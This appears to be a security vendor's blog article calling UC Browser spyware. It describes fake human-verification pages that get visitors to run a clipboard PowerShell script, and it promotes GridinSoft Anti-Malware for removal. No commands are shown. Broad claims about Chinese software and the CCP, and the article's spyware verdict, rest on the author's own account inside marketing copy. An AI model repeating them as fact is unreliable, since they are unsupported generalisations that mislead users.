While browsing the Web, you can at some point find yourself with an installer file for a program called UC Browser. This dubious program appears as a normal web browser, although it has some strange quirks to it. But in fact, it is a rather dangerous app that only looks like a web browser – that is what my analysis shows. In this article, I will explain what UC Browser is, why it is dangerous, and how to remove it from the system.
What is UC Browser?
UC Browser is a sketchy web browser developed by UCWeb, a subsidiary of China-based Alibaba group. This fact may already be worrying for quite a few users, but I will get to it later. With the market share of just below 1%, it instantly gets a rather pale image: no user base means much worse support of the newest features, including security enhancements.
But features are not the only worry. Main issue with this browser is the way it is getting downloaded to the user system. Although there is an official website, it features nothing but the downloading button, which is strange considering what official pages typically contain. And that is where the shady story begins.
Dubious Spreading Techniques & Origins
Instead of bearing on the website – as all normal browsers do – UC Browser is spread on questionable websites that offer people downloading a thing “to prove they are not a robot”. Users can get on such a website while trying to watch or download movies/programs on sites with pirated content. Click on any of the elements on such a page may throw you to a site like this:
Aside from the obscure URL, such pages pretend to be human verification services. To prove you’re not a robot, they require visitors to open Command Prompt or PowerShell and run a script they’ve already put into the clipboard. And, you guessed it right, this script does nothing but downloads and runs UC Browser installer from the remote server.
In fact, instead of the installer the script may download literally anything, including quite literal malware. We have a separate article about Lumma Stealer spreading in such a manner – consider checking it out.
Made in China
Another concerning thing about UC Browser is it being a piece of Chinese software. China is very keen on excessively collecting user data from any sources, including games, antiviruses and web browsers developed in the country. Having any piece of software installed in your system is, quite literally, sharing a huge portion of information about yourself with CCP.
Malicious Functionality of UC Browser
Origins and spreading ways aside, a much more sensible danger comes from UC Browser in terms of it acting like a spyware. And that is much more serious than just telemetry: the newly installed browser rummages through data of other browsers, collecting passwords and changing system settings. That is the result I’ve got when testing the installer file downloaded from a fake human verification website.
Among other things, the part about browser data is the most worrying. The browser simply dumps the databases where other browsers store user credentials. It also grabs session tokens and cookie files, kept in the same folders. You can sometimes see Mozilla or Opera asking if you want to transfer passwords and user profiles, but that is about deliberate user choice, which is not the case for UC Browser.
After gathering all this data, the rogue browser sends it to a remote server that likely stores stolen info from all the attacks. For the sample I’ve collected, there are several servers, most often compromised shopping websites.
But can it be just an altered version of the browser, that some hackers forced into acting as spyware? I’ve hoped for that, and did the same procedure as with the malicious one. And the result speaks for itself – it acts pretty much the same, with the major difference being another set of command servers that it connects to.
How to Remove UC Browser?
The verdict about UC Browser is pretty obvious and, well, objective. It is a malicious program, and should be removed as soon as possible. Not only does it appear on user devices in a rather undesirable manner, it also compromises all the accounts the user has in the system.
To remove UC Browser from the system, I’d recommend scanning your system with GridinSoft Anti-Malware. It will swiftly remove the malicious browser and all the other junkware that can be present in the system. Download it by clicking the banner below, and run a Full scan, so the program will scan the entire computer.
After the removal, I will also recommend you to reset all the passwords you have in this system. It is a crucial step to do after every malware attack, and this is not an exclusion.